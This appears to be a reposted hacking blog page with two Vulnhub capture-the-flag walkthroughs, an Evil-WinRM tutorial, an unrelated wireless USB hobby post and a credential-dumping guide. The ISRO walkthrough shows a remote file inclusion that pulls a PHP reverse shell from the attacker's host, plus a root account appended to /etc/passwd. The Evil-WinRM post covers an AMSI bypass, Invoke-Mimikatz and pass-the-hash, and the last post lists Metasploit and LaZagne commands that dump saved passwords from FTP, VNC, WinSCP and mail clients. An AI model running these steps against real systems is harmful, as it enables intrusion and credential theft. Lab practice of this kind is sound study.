Saturday, June 13, 2020

HA: ISRO Vulnhub Walkthrough

Today we are going to solve our CTF challenge called “HA: ISRO”. We have developed this lab for the purpose of online penetration testing practice. Solving this lab is not that tough if you have proper basic knowledge of penetration testing. Let’s start and learn how to breach it.
Download Here
Level: Intermediate
Task: Find 4 Flags on the victim’s machine.

Penetration Methodologies

  • Scanning Network
    • Netdiscover
    • Nmap
  • Enumeration
    • Browsing HTTP Service
    • Performing Directory Bruteforce
  • Exploitation
    • File Inclusion (LFI/RFI)
    • Reading the /etc/passwd file
    • Create PHP reverse shell
    • Getting a reverse connection
    • Spawning a TTY Shell
    • Enumerating the local MySQL service
  • Privilege Escalation
    • Writable /etc/passwd File

Walkthrough

Scanning Network

First of all we need to identify our target, and for this we use the following command:
netdiscover
Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:
nmap -A 192.168.1.104

Enumeration

From the nmap scan we now know that ports 22 and 80 are open, running SSH and HTTP respectively. Since port 80 is open, we open the target IP address in our browser as shown in the following image:
http://192.168.1.104
It opened a webpage as shown in the above image. Here we found a link to the Bhaskara page; opening it, we found an information page as shown in the image below:
http://192.168.1.104/bhaskara.html
As a convention, we enumerate the webpage by going through its source code. There we find a “Bhaskara Launch Code”, which looks like base64-encoded text.
We decode it with a combination of the echo command and base64 -d:
echo "L2JoYXNrYXJh" | base64 -d
The decoded text is “/bhaskara”. This seems to be a hint that there is a directory or file named bhaskara on the web server.
So we browsed to /bhaskara. Instead of a page, a 2MB file is downloaded. After examining the file we concluded that it is a TrueCrypt volume.
To crack its password we first extract a John-compatible hash with true.py, a TrueCrypt-to-John hash extractor (the truecrypt2john.py script that ships with John the Ripper jumbo does the same job). We ran John against the extracted hash file and then displayed the cracked password with --show; it came out as xavier.
python true.py bhaskara > hashes
john hashes --show
Now that we know it is a TrueCrypt volume, it is likely hiding something inside. So we tried to open it with VeraCrypt by providing its path and selecting a slot as shown in the given image.
Upon mounting the TrueCrypt file on a slot, we are asked to enter the password. We enter the password that we found earlier i.e. ‘xavier’ 
 It opened up to show a text file labelled ‘flag.txt’. We opened it; it gave us our first flag. Bhaskara Flag.
Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}
Moving on with enumeration, we also ran a directory scan, which gave us an /img directory, and a second scan with the .php extension, which found connect.php.
dirb http://192.168.1.104
dirb http://192.168.1.104 -X .php
We went into the /img directory. Here we found an image called aryabhata.jpg.
We downloaded aryabhata.jpg and opened it. It turned out to be a poster for the Aryabhata satellite, as shown in the image given below.
As we couldn’t find anything specific in the image itself, we suspected steganography and used steghide to extract whatever might be hidden in it. It contained a text file named flag.txt, which holds the Aryabhata flag.
steghide extract -sf aryabhata.jpg
cat flag.txt
Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation

Back to the web browser: our dirb bruteforce had also found connect.php, which showed nothing on its own. We guessed that it takes a parameter and tested it with a “file” parameter pointing at /etc/passwd. As the image below shows, the contents of the file come back, so connect.php has a file inclusion vulnerability.
192.168.1.104/connect.php?file=/etc/passwd
We edited shell.php (a PHP reverse shell) to set the attacker machine’s IP address and listening port, saved it, and then served it to the target with Python’s built-in HTTP server:
nano shell.php
python -m SimpleHTTPServer
We will catch the reverse connection with netcat, so we start a listener on the port configured in the shell file:
nc -lvp 1234
With the listener running on the attacker machine, we make the target include the shell over HTTP through the same file parameter. This works because the include also accepts remote URLs (PHP’s allow_url_include must be enabled for this), which makes it a remote file inclusion rather than only a local one:
192.168.1.104/connect.php?file=http://192.168.1.103:8000/shell.php
Upon execution we received a session on the target machine. As seen in the image given below, it was not a proper TTY, so we used a Python one-liner to upgrade it into a proper shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
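The connect.php flaw above is a PHP include that trusts whatever the client sends, which is why both a local path (/etc/passwd) and a remote URL (the hosted shell.php) were pulled in. The following Python is an added example, not code from the original walkthrough or from the target: it models the vulnerable resolver next to a hardened one and runs both over constructed requests. INCLUDE_DIR, the allowlist and the request strings are assumptions for the illustration.

```python
import posixpath
from urllib.parse import urlsplit

# Assumed layout for the example (the target's real paths are not known).
INCLUDE_DIR = "/var/www/html/inc"
ALLOWED_INCLUDES = ("header.php", "footer.php")


def vulnerable_resolve(file_param: str) -> str:
    """What include($_GET['file']) does: the client value is used verbatim,
    so "/etc/passwd" is read from disk (LFI) and, with allow_url_include=On,
    "http://attacker/shell.php" is fetched and executed (RFI)."""
    return file_param


def hardened_resolve(file_param: str, allowlist=ALLOWED_INCLUDES):
    """Return a safe absolute path for the requested include, or None.

    Three independent checks, each of which alone would have stopped one of
    the requests made in the walkthrough:
      1. no URL scheme  -> blocks http://, ftp://, php://filter, data: ...
      2. confinement    -> blocks absolute paths and ../ traversal
      3. allowlist      -> only the includes the application actually uses
    """
    if urlsplit(file_param).scheme:
        return None
    candidate = posixpath.normpath(posixpath.join(INCLUDE_DIR, file_param))
    if not candidate.startswith(INCLUDE_DIR + "/"):
        return None
    if posixpath.basename(candidate) not in allowlist:
        return None
    return candidate


# Constructed inputs modelled on the two requests in the walkthrough plus the
# usual variants an attacker tries next.
REQUESTS = [
    "header.php",
    "/etc/passwd",
    "../../../../etc/passwd",
    "http://192.168.1.103:8000/shell.php",
    "php://filter/convert.base64-encode/resource=connect.php",
    "header.php\x00.txt",
]


def compare(requests=REQUESTS):
    """Map each request to (what the vulnerable code opens, what the hardened code opens)."""
    return {r: (vulnerable_resolve(r), hardened_resolve(r)) for r in requests}


if __name__ == "__main__":
    for req, (vuln, safe) in compare().items():
        print(f"{req!r:58} vulnerable -> {vuln!r:45} hardened -> {safe!r}")
```

Only the first request survives the hardened resolver; the null-byte variant is caught by comparing the full basename against the allowlist rather than by a prefix or extension check.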
We used netstat to check which ports the target is listening on and found that port 3306 is bound to localhost only. The most common service on port 3306 is MySQL, so let’s enumerate in that direction.
netstat -antp
We tried to log in to MySQL as root, which worked without a password. After logging in we listed the databases and found one named ‘flag’. Looking at its table gave us our third flag, the Mangalyaan flag.
mysql -u root 
show databases;
use flag;
show tables;
select * from flag;
Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation

As part of our enumeration for privilege escalation, we check whether /etc/passwd is writable by our user. It is, in fact, writable, and that is our way forward.
ls -la /etc/passwd
Next we need a password hash for the user we are going to add to /etc/passwd. We use openssl to generate a salted MD5-crypt hash:
openssl passwd -1 -salt user3 pass123
Back in our remote shell on the target, we use that hash to append a user raj with UID 0 and GID 0, i.e. a root-equivalent account, using echo, and confirm the entry with tail. All that is left is to su to the new user with the password pass123, which gives us a root shell. We then moved into the root directory to find the final flag, the Chandrayaan flag.
echo 'raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash' >>/etc/passwd
tail /etc/passwd
su raj
Password: pass123
cd /root
ls
cat final.txt
Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2} 

Wednesday, June 10, 2020

Evil-Winrm : Winrm Pentesting Framework


In this post we discuss Evil-Winrm, the best-known tool for obtaining a PowerShell remote shell over WinRM. It is an open-source tool available on GitHub for WinRM penetration testing.

Table of Content

  • Evil-winrm
  • Features
  • Installation
  • Load PowerShell scripts
  • Pass the Hash
  • Install using its Docker image

Evil-winrm

This program can be used against any Microsoft Windows server with WinRM enabled (usually on port 5985, or 5986 for HTTPS), of course only if you have credentials and permissions to use it, so it belongs to the post-exploitation phase of a pentest. Its purpose is to provide nice, easy-to-use features for hacking. It can be used for legitimate purposes by system administrators as well, but most of its features are focused on hacking/pentesting.
Features
  • Compatible with Linux and Windows client systems
  • Load in memory Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) assemblies bypassing some AVs
  • Load x64 payloads generated with awesome donut technique
  • AMSI Bypass
  • Pass-the-hash support
  • Kerberos auth support
  • SSL and certificates support
  • Upload and download files showing a progress bar
  • List remote machine services without privileges
  • Command History
  • WinRM command completion
  • Local files completion
  • Colorization on prompt and output messages (can be disabled optionally)
  • Docker support (prebuilt images available at Dockerhub)
  • Trap capturing to avoid accidental shell exit on Ctrl+C

Installation 

In this post we cover two easy ways to install evil-winrm on Kali Linux; you will find more installation methods on GitHub.
With Ruby gems you can install evil-winrm directly, and all dependencies are pulled in automatically, by executing the following command:
gem install evil-winrm
Once installed, you can show its help by typing ‘evil-winrm’; this displays the syntax and options for running evil-winrm against the Windows Remote Management service.
Now we use evil-winrm to get a shell on the remote machine by connecting to port 5985, where WinRM listens. As a result it gives us the victim’s PowerShell, as shown below.
Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’>
evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'
It provides not only a shell on the host but also a menu of loadable functions such as Invoke-Binary, Dll-Loader, Donut-Loader and Bypass-4MSI.

Load PowerShell scripts

We have some pentesting PowerShell scripts in /root/powershell, and we can load these .ps1 scripts into the host through evil-winrm.
The .ps1 scripts must be in the path given with the -s argument; run it as follows:
Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’> -s <path>
evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987' -s /root/powershell
Type menu again to see the loaded functions, run Bypass-4MSI first, then load and invoke the script. Here we load the Invoke-Mimikatz PowerShell script to dump stored credentials.
menu
Bypass-4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz
As a result it dumped the credentials stored on the Windows server.

Pass the Hash

It has one more feature: Pass the Hash. Instead of the clear-text password you supply the user’s NT hash, and evil-winrm gives you the same shell on the host machine.

Install using its Docker image

This is a very easy and convenient way to get evil-winrm onto your attacking machine and, in the same command, obtain a shell on the victim by connecting to its WinRM service. You only need to execute the following command.
docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'
+------------------------------------------------- This is only an educational purposes only I am not responsible for further activities Join my forum and learn more ethical hacking and penetration testing https://t.me/WhiteHatHacks Get me at alex14324.blogspot.com https://t.me/alex14324 https://github.com/alex14324 https://discord.gg/6NPtGxZ -------------------------------------------------------+

Friday, May 29, 2020

Zion Vulnhub Walkthrough

Today I am going to share a writeup for the boot2root challenge of the Vulnhub machine “Zion”. It is an intermediate Linux box. The goal for this machine is to read the flag.txt file.

Penetration Testing Methodology

  • Network Scanning
    • Netdiscover scan
    • Nmap Scan
  • Enumeration
    • Enumerating HTTP service on Browser
    • Inspecting the Login Panel using BurpSuite
    • Decoding Base64 and Base62 messages
  • Exploitation
    • Crafting the Dictionary using Cewl
    • Bruteforcing using BurpSuite
    • Enumerating the Web Application
  • Post Exploitation
    • Connecting using SSH
    • Enumerating for Sudo Rights
  • Privilege Escalation
    • Abusing Sudo Rights on cp
Walkthrough

Network Scanning

We begin by scanning our network for the target machine using Netdiscover. The target machine is active on 192.168.1.109. Let’s scan it and see which ports are open and which services are running.
We do an aggressive scan of all ports on the target using nmap.
nmap -p- -A 192.168.1.109

Enumeration

The scan gives us a lot of useful information, but what stands out most is that ports 22 and 80 are open. Let’s explore port 80 first and see what we can find there.
Here we see two buttons, “Truth” and “Illusion”: the Red Pill / Blue Pill choice that Morpheus offered Neo in the Matrix trilogy. Clicking on the Truth button takes us to a login page.
After looking around the login panel for a while, I decided to inspect it with BurpSuite. I captured the request and sent it to the Repeater. Checking the response, we see some odd parameters whose values look encoded.
Guessing the encoding might be Base64, I decoded the banner value with the Decoder. This gave us a message telling us to “Open our mind”, and also to avoid certain characters.
This means the message left for us is not plain Base64. If we drop the characters that Base64 has and Base62 lacks (‘+’, ‘/’ and the ‘=’ padding), what remains is Base62. So let’s decode the message with a Base62 decoder; you can find one online.
The decoded message gives us hints for the credentials of “Zion’s Systems”. It tells us to look at the choice page we were on a few moments before, gives us the username “morpheus.thematrix”, and says that this user likes to keep simple passwords.
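The Base64-versus-Base62 step above in code, added here as an example and not part of the original writeup: a Base62 codec (big-integer conversion over a 62-character alphabet), plus a decode_hint helper that tries Base64 first, as the writeup did, and falls back to Base62 when Base64 fails or yields non-text. The alphabet order is an assumption, since Base62 has no standard and online decoders differ; the sample banner and secret strings are constructed and are not the values from the Zion box.

```python
import base64
import binascii

# Assumed alphabet: digits, then upper case, then lower case. Every Base62
# variant shares the property that matters here: no '+', '/' or '=' padding.
B62_ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
B62_INDEX = {ch: i for i, ch in enumerate(B62_ALPHABET)}


def base62_encode(data: bytes) -> str:
    """Big-integer conversion; leading zero bytes are kept as leading '0's."""
    n = int.from_bytes(data, "big")
    digits = []
    while n:
        n, rem = divmod(n, 62)
        digits.append(B62_ALPHABET[rem])
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "0" * pad + "".join(reversed(digits))


def base62_decode(text: str) -> bytes:
    n = 0
    for ch in text:
        if ch not in B62_INDEX:          # '+', '/', '=' land here
            raise ValueError(f"not a Base62 character: {ch!r}")
        n = n * 62 + B62_INDEX[ch]
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(text) - len(text.lstrip("0"))
    return b"\x00" * pad + body


def _printable(raw: bytes) -> bool:
    try:
        return raw.decode("ascii").isprintable()
    except UnicodeDecodeError:
        return False


def decode_hint(text: str):
    """Try Base64 (strict) first; if it fails or gives non-text, use Base62.
    Returns (encoding name, decoded bytes)."""
    try:
        raw = base64.b64decode(text, validate=True)
        if _printable(raw):
            return "base64", raw
    except binascii.Error:
        pass
    return "base62", base62_decode(text)


# Constructed sample values (not the real strings from the box).
BANNER_B64 = "T3BlbiB5b3VyIG1pbmQ="          # Base64 of "Open your mind"
SECRET = b"user: morpheus.thematrix, likes simple passwords"
SECRET_B62 = base62_encode(SECRET)

if __name__ == "__main__":
    print(decode_hint(BANNER_B64))
    print(SECRET_B62)
    print(decode_hint(SECRET_B62))
```

Strict Base64 decoding is the useful tell: a Base62 string is usually the wrong length for Base64 and has no padding, so validate=True rejects it instead of silently producing garbage.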

Exploitation

There are multiple ways to get at the password. We could try manually, but with an arsenal of tools that can do it for us, why waste the time. I decided to build a dictionary for bruteforcing the login with cewl. Using cewl is simple: provide the URL and the output file path, and cewl crawls the page and writes every word it finds into the dictionary.
cewl http://192.168.1.109/ -w dict.txt
For the brute force we use BurpSuite’s Intruder module. We capture the request sent by the “Login” button with some sample text in the password box.
I used “test” as the sample text. The request is sent to Intruder with the shortcut “Ctrl + I”.
In Intruder we go to the Positions tab and select the attack type Sniper. Then we set the payload position, i.e. the text that will be brute-forced: here it is the password parameter, so we select “test” as the placeholder and add the “§” markers around it with the “Add §” button, as shown in the image given below.
Next, in the Payloads tab, we choose the payload type Simple list under Payload Sets and load the cewl dictionary with the Load button in the Payload Options section. Then we click Start attack.
A new window opens in which Burp tries each word from the dictionary. One response differs from the rest: the request with the password “interpreted” returns a redirect. That is a strong sign it is the correct password, so let’s check it.
We go back to the Login Panel, and try the following credentials to login.
Username: morpheus.thematrix
Password: interpreted
This opens up Zion’s System. Here we see some information about the user w.rabbit: he has forgotten his password, so the administrator has disabled password logins for him and set up something movie-related instead (Matrix, I suppose). I also see a link for a Private key in the top right section, as shown in the image given below.
The link leads to a page called rabbit-hole/rsa_priv_key_for_w.rabbit.txt, a private key for the user w.rabbit. This means we can log in over SSH as this user.

Post Exploitation

I copied the contents of the key into an empty file saved as “key” (SSH refuses a key file that other users can read, so its permissions must be restricted to the owner). Since port 22 is open on the target, we log in over SSH with this key. Enumerating the box, we find warning.txt, which tells us the path in which to find the flag and leaves the method up to us. Enumerating further in the mail directory, I found the credentials of the user w.rabbit. We are already logged in as w.rabbit, but with the password we can now use sudo as w.rabbit, so we check which commands we can run with elevated privileges. We can see that cp can be run as the user dozer.
ssh -i key w.rabbit@192.168.1.109
cat warning.txt
cat w.rabbit.txt
sudo -l
This means we can run /bin/cp as the user dozer through sudo, authenticating with the w.rabbit password we found in the mail directory.

Privilege Escalation

In the step above we learned that we can run /bin/cp via sudo as the user dozer, and during enumeration we obtained the sudo password for w.rabbit. So let’s use /bin/cp through sudo to escalate to dozer: because cp runs as dozer it can read dozer’s files, so we copy flag.txt into /tmp without preserving its mode and ownership, which leaves the copy readable by us, and then display it:
/bin/sudo -u dozer /bin/cp --no-preserve=mode,ownership /home/dozer/flag.txt /tmp/flag.txt
cat /tmp/flag.txt
And there is /home/dozer/flag.txt. That’s all for now, see you next time.


Friday, May 22, 2020

Protect Your USB ports from USB killer with Wi-USB

For Wireless USB for Instant IoT

Short explanation:
This is a device that allows you to connect almost any USB device to your computer....without a USB cable. It uses a USB message to IP message wrapper and creates a simple virtual COM port on your PC. This device is a true USB host and you can use it to make almost any USB device instantly wireless. 
It works very reliably (as long as your Wi-Fi signal strength is not poor), and seems to be the quickest way to get a project both wireless and on the internet.
Long explanation:
Imagine if you will: You have an Arduino connected to your PC via good old USB. THEN....you cut that USB cable in half, and attach an antenna to either cable stump. Then, you move the Arduino further away from your computer, maybe you even move it to the other side of house.
You click "Upload" in the Arduino IDE and voila!...the sketch uploads successfully. If your sketch has the Arduino writing over serial, you can even open the serial monitor and your data comes through, no problem.
Oh you don't use Arduinos? Okay, maybe you use a USB webcam, or a USB-controlled 3D printer, a normal printer, a USB nerf turret...or even some other fancy new microcontroller. Either way, it is now totally wireless, and you didn't need to write (or even copy and paste) a single line of code.
That's what I wanted, and, as is typical for me, it pretty much didn't exist.
So I did it myself!
Here is how it works: The Linux Single-Board-Computer (SBC) inside the 3D printed case has a "USB host" port, which basically means it can have slave devices (arduinos, flash drives, 3D printers, etc) connect to it. Your PC has lots of host ports, whereas your Arduino has none. That's why you can't connect two Arduinos together via USB (not without a host shield at least, and even then, you'd need drivers!).
SO, we have a USB host port. That's the first step in the right direction. Now, we need the Linux SBC to be connected to your home wireless network. Let's skip the details for now, but take my word for it...that part is easy. Great, now our Linux SBC is on your wifi!
Then, we connect something...(let's say an Arduino for now, as an example)...to the USB host port on the Linux SBC.
This is when the Linux SBC starts doing something sneaky, and clever. It reads the USB messages zooming to and from your Arduino, and uses a "USB/IP" protocol to wrap those messages up into little IP messages. Now, these IP messages (secretly USB messages), get sent over your network back to your PC. Your PC is running some nice software that knows how to convert these IP messages BACK into USB messages. It feeds these USB messages into a "Virtual USB port", which is basically a real USB port, as far as your PC is concerned.
After that, you're good to go - Device Manager will show that an Arduino is connected on COM-XYZ. Fire up the Arduino IDE and upload a sketch, it works, no problem. From here on out, the system behaves as if you are connected directly via USB....but you know better. The little bugger is actually all the way upstairs, tending to your automated houseplant watering system. 
Side rant about why I went down this track:
Now that it is the year 2017, it seems like every project is supposed to be an "IoT" project of some kind.
I've done my fair share of ESP8266 projects, but as a relatively weak coder, it usually ends up slowing me down a LOT when it comes time to code up a little nodejs page or parsing some long string of data from one or more sensors.
The last ten years has seen a literal revolution in accessibility to powerful tools for hobbyists and engineers, but connecting stuff to the internet (or just being wireless in any sense) continues to be a challenge if you aren't a strong programmer. Admittedly, the learning curve is better than it has ever been, but I am spoiled and I want to connect my projects to the internet in...a minute.....and have it be over with and just work.
There are some pretty great products out there now (and even greater community support and how-to articles!) but I still feel like there is a little gap when it comes to INSTANT IoT. That's why I did this project, and I hope that some people in this community will like it!

Sunday, May 10, 2020

Credential Dumping: Applications

This article is part of the Credential Dumping series. In it we learn how to dump saved credentials from various applications such as CoreFTP, FileZilla, WinSCP, PuTTY, etc.

Table of Content:

  • PowerShell Empire: SessionGopher
  • Credential Dumping: CoreFTP
    • Metasploit Framework
  • Credential Dumping: FTP Navigator
    • Metasploit Framework
    • Lazagne
  • Credential Dumping: FileZilla
    • Metasploit Framework
  • Credential Dumping: HeidiSQL
    • Metasploit Framework
  • Credential Dumping: Emails
    • Mail Pass View
  • Credential Dumping: Pidgin
    • Metasploit Framework
  • Credential Dumping: PSI
    • LaZagne
  • Credential Dumping: PST
    • PST Password
  • Credential Dumping: VNC
    • Metasploit Framework
  • Credential Dumping: WinSCP
    • LaZagne
    • Metasploit Framework

PowerShell Empire

Empire provides a module that retrieves saved credentials from various applications such as PuTTY and WinSCP; it finds and dumps the passwords automatically without you having to do anything further. Once you have a session in Empire, use the following commands to execute the module:
usemodule credentials/sessiongopher
execute
As you can see in the images above and below, it successfully retrieves the passwords of WinSCP and PuTTY.
Now we focus on individual applications and see how to retrieve their passwords, one by one. Let’s get going!

CoreFTP: Metasploit Framework

Core FTP is an FTP client made especially for Windows. It lets you send and receive files over the network using the FTP protocol, which makes it easy to use regardless of the operating system on the other end.
With the help of Metasploit we can dump the credentials that Core FTP saves in the registry of the target system, under HKEY_CURRENT_USER\SOFTWARE\FTPWare\CoreFTP\Sites. Once you have a session, run the post module:
use post/windows/gather/credentials/coreftp
set session 1
exploit

FTP Navigator: LaZagne

Just like Core FTP, FTP Navigator is an FTP client that makes transferring, editing and renaming files over the network easy. It can also keep local and remote directories in sync. Run lazagne.exe all and the FTP Navigator credentials appear as shown below:

FTPNavigator: Metasploit Framework

The credentials of FTP Navigator can also be dumped with Metasploit, which has a built-in post module for it. To use it, type:
use post/windows/gather/credentials/ftpnavigator
set session 1
exploit
As you can see in the image above, as expected we have the credentials.

FileZilla: Metasploit Framework

FileZilla is another open-source FTP client/server package. It runs on Windows, Linux and macOS and, again, is used for transferring or editing files over a network. We can dump its credentials using Metasploit; to do so, type:
use post/multi/gather/filezilla_client_cred
set session 1
exploit
And so, we have successfully retrieved the credentials

HeidiSQL: Metasploit Framework

HeidiSQL is an open-source client for MySQL, MSSQL, PostgreSQL and SQLite. It can save numerous sessions together with their connection credentials, and lets you run multiple sessions in a single window, which makes managing databases easy. Again, using Metasploit we can get our hands on its credentials with the following post module:
use post/windows/gather/credentials/heidisql
set session 1
exploit

Email: Mail PassView

All the email passwords stored on the system can be retrieved with the NirSoft tool Mail PassView, which is well suited to internal pentesting. Simply download the software from here. Launch the tool to get the credentials as shown below:

Pidgin: Metasploit Framework

Pidgin is an instant messaging client that lets you chat over multiple networks, runs on every major operating system and also supports file transfer. Metasploit has a built-in post module for Pidgin too. To run it, use the following commands:
use post/multi/gather/pidgin_cred
set session 1
run
And all the credentials will be on your screen.

PSI: LaZagne

PSI is an instant messenger for the XMPP network. It also supports file transfer, is highly customisable and is available in many languages. With the lazagne.exe chat command, LaZagne dumps its password as shown in the image below:

PST: PstPassword

NirSoft provides a tool that retrieves the passwords of Outlook PST files. You can download this tool from here. Simply launch it and the passwords are shown as below:

VNC: Metasploit Framework

VNC is remote-access software that lets you reach your device from anywhere in the world. VNC passwords can be retrieved easily with Metasploit; to do so, type:
use post/windows/gather/credentials/vnc
set session 2
exploit

WinSCP: LaZagne

WinSCP is an SFTP/SCP/FTP client for Windows that borrows its SSH implementation from PuTTY. It has a graphical interface, is available in many languages, and also works as a remote editor. Both LaZagne and Metasploit can retrieve its passwords. In LaZagne, use the command lazagne.exe all and it dumps the credentials as shown in the image below:

WinSCP: Metasploit Framework

To retrieve the credentials with Metasploit, use the following post module:
use post/windows/gather/credentials/winscp
set session 1
exploit
This way, you can retrieve credentials of multiple applications.
